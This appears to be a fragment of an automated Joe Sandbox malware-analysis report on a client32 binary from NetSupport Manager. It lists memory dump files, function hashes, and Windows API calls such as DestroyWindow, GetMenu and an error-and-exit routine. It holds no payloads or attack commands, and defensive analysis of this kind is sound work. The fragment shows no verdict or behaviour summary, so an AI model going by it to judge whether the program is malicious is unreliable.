                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FindMessageSendWindow
                                                                                                                • String ID: MSOfficeWClass
                                                                                                                • API String ID: 1741975844-970895155
                                                                                                                • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                                                • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                                                • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                                • API String ID: 1417657345-2201682149
                                                                                                                • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                                • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                                                • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                                • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                                                APIs
                                                                                                                • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                                                • m_hWnd, xrefs: 1101D3A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                • API String ID: 1590435379-2830328467
                                                                                                                • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                                • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                                                • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                                • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384